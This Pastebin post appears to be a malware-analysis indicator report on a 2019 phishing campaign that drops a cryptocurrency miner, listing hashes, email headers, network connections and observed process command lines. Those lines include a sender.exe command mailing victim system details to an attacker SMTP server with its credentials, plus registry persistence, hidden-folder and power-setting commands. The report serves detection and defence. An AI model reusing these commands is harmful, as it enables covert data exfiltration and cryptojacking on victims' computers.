Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #coinminer #bmcon #SCR
- https://pastebin.com/ELpZTc1y
- attack_vector
- --------------
- email attach > SCR > C:\Intel\*
- email_headers
- --------------
- Received: from [10.10.18.73] (helo=frv73.fwdcdn.com) by frv53.fwdcdn.com;
- Received: from mx-out-10.default-host.net ([185.104.44.45]) by frv73.fwdcdn.com
- Received: from [10.109.98.35] (unknown [46.148.20.31]) by mx-out-10.default-host.net
- From: Вiкторiя Коваль <mail@pilontravel.com>
- To: <user0@victim.com>
- Subject: Добрий день
- Date: Mon, 25 Feb 2019 07:27:41 +0200
- files
- --------------
- SHA-256 5f4f4063cd0fbc81d6c3c27faddda1dfb141afdc0b2f570b4a50184b9c54f36c
- File name Платіжне доручення 1C №14343676173 - 2019.rar [RAR archive data, v69]
- File size 735.93 KB
- SHA-256 de27c7d0366b0171ce8d913e8749aac3d17e0c0ddf58b69ca5722510f006df65
- File name Платіжне доручення 1C №14343676173 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 793.76 KB
- SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
- File name bmcon.exe
- File size 354.5 KB
- SHA-256 f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04
- File name private.exe
- File size 292.87 KB
- SHA-256 1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918
- File name sender.exe
- File size 220 KB
- SHA-256 1fd1d4bc4f013d8b4f9add82dfcaa507f771e2261d31b063fa96366c91dcdd46
- File name bmstart.exe
- File size 349.5 KB
- SHA-256 25b54ffbe7427a7ee0113519785266d9aea4b92fe7c4e2e0fcc5852dbc6561f8
- File name bm-xmrig.exe
- File size 467.5 KB
- activity
- **************
- SEND SMTP_587
- --------------
- 220 vserver321.axc.nl ESMTP Exim 4.91 Mon, 25 Feb 2019 12:16:42 +0100
- EHLO victim
- 250-vserver321.axc.nl Hello victim [victim-Public-IP]
- 250-SIZE 52428800
- 250-8BITMIME
- 250-PIPELINING
- 250-AUTH PLAIN LOGIN
- 250-STARTTLS
- 250 HELP
- AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
- 235 Authentication succeeded
- MAIL FROM:<sender@download-files.site> BODY=8BITMIME
- 250 OK
- RCPT TO:<recipient@8680541.store>
- 250 Accepted
- DATA
- 354 Enter message, ending with "." on a line by itself
- Date: Mon, 25 Feb 2019 13:16:12 +0200
- From: Robot Ukr<sender@download-files.site>
- To: recipient@8680541.store
- X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
- Message-ID: <01d4ccfb$Blat.v3.0.7$841b4e9f$6e43fb7980@download-files.site>
- Subject: victim-PC/User-admin
- MIME-Version: 1.0
- Content-Transfer-Encoding: quoted-printable
- Content-Type: text/plain;
- charset="UTF-8"
- OS-Windows7 x64/CPU
- PU-...................... VGA ...................... ..............
- .
- 250 OK id=1gyEFX-00CvKe-IH
- QUIT
- 221 vserver321.axc.nl closing connection
- netwrk
- --------------
- http.request.method == GET
- 91.223.19.233 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJB... HTTP/1.1 Microsoft-CryptoAPI/6.1
- 91.223.19.242 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJB... HTTP/1.1 Microsoft-CryptoAPI/6.1
- 205.185.216.42 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?ef2a83e4926beeac HTTP/1.1 Microsoft-CryptoAPI/6.1
- ssl
- 88.99.38.225 dl.browsermine.com Client Hello
- comp
- --------------
- bmcon.exe 3048 TCP localhost 49231 88.99.38.225 443 ESTABLISHED
- bmcon.exe 3048 TCP localhost 49232 91.223.19.233 80 ESTABLISHED
- bmcon.exe 3048 TCP localhost 49233 91.223.19.242 80 ESTABLISHED
- bm-xmrig.exe 3000 TCP localhost 49236 159.69.189.115 4444 ESTABLISHED
- svchost.exe 244 TCP localhost 49237 205.185.216.42 80 ESTABLISHED
- bm-xmrig.exe 3000 TCP localhost 49236 159.69.189.115 4444 ESTABLISHED
- proc
- --------------
- "C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\cmd.exe /c ""C:\Intel\enable.cmd" "
- C:\Windows\SysWOW64\reg.exe reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f
- C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0
- C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0
- C:\Windows\SysWOW64\powercfg.exe -h off
- C:\Windows\SysWOW64\attrib.exe +s +h C:\Intel
- C:\Windows\SysWOW64\attrib.exe +s +h C:\Intel\bmcon
- C:\Windows\SysWOW64\cmd.exe /c ver
- C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
- C:\Windows\SysWOW64\Wbem\WMIC.exe CPU Get Name /Value
- C:\Windows\SysWOW64\cmd.exe /c /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
- C:\Windows\SysWOW64\Wbem\WMIC.exe /Node:localhost Path Win32_VideoController Get Name /Value
- C:\Intel\sender.exe -to recipient@8680541.store -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw epsiloneridana -subject "PC-APM11/User-support" -body "OS-Windows7 x64/CPU..."
- C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f
- C:\Windows\SysWOW64\PING.EXE -n 300 127.0.0.1
- C:\Intel\bmcon.exe
- "C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
- C:\Intel\bmcon\bm-xmrig.exe
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.02.2019 13:16
- #1 BMCon
- c:\intel\bmcon.exe 03.11.2018 2:42
- #2 private
- 17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
- c:\intel\private.exe 20.06.1992 0:22
- drop
- --------------
- C:\Intel\bmcon.exe
- C:\Intel\bmcon.json
- C:\Intel\GfxUI.exe.config
- C:\Intel\IGFXDEVLib.dll
- C:\Intel\iglhxa32.vp
- C:\Intel\Impcd.cat
- C:\Intel\IntcDAuC.dll
- C:\Intel\mup.xml
- C:\Intel\private.exe
- C:\Intel\readme-VGA.txt
- C:\Intel\sender.exe
- C:\Intel\Setup2.if2
- C:\Intel\bmcon\apps.json
- C:\Intel\bmcon\bmstart.exe
- C:\Intel\bmcon\bm-xmrig.exe
- C:\Intel\bmcon\bm-xmrig.json
- C:\Intel\bmcon\bm-xmrig-amd.exe
- C:\Intel\bmcon\bm-xmrig-amd.json
- C:\Intel\bmcon\bm-xmrig-nvidia.exe
- C:\Intel\bmcon\bm-xmrig-nvidia.json
- C:\Intel\bmcon\bm-xmrig-nvidia-cuda8.exe
- C:\Intel\bmcon\bm-xmrig-nvidia-cuda10.exe
- C:\Intel\bmcon\bm-xmrig-x32.exe
- # # #
- https://www.virustotal.com/#/file/5f4f4063cd0fbc81d6c3c27faddda1dfb141afdc0b2f570b4a50184b9c54f36c/details
- https://www.virustotal.com/#/file/de27c7d0366b0171ce8d913e8749aac3d17e0c0ddf58b69ca5722510f006df65/details
- https://analyze.intezer.com/#/analyses/b8d83fe5-1420-48e5-a64d-a7fa8b858cf8
- https://www.virustotal.com/#/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
- https://www.virustotal.com/#/file/f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04/details
- https://www.virustotal.com/#/file/1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918/details
- https://www.virustotal.com/#/file/1fd1d4bc4f013d8b4f9add82dfcaa507f771e2261d31b063fa96366c91dcdd46/details
- https://www.virustotal.com/#/file/25b54ffbe7427a7ee0113519785266d9aea4b92fe7c4e2e0fcc5852dbc6561f8/details
- https://analyze.intezer.com/#/analyses/8b737361-aa0c-42b0-99ce-fe8ae2fe8742
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement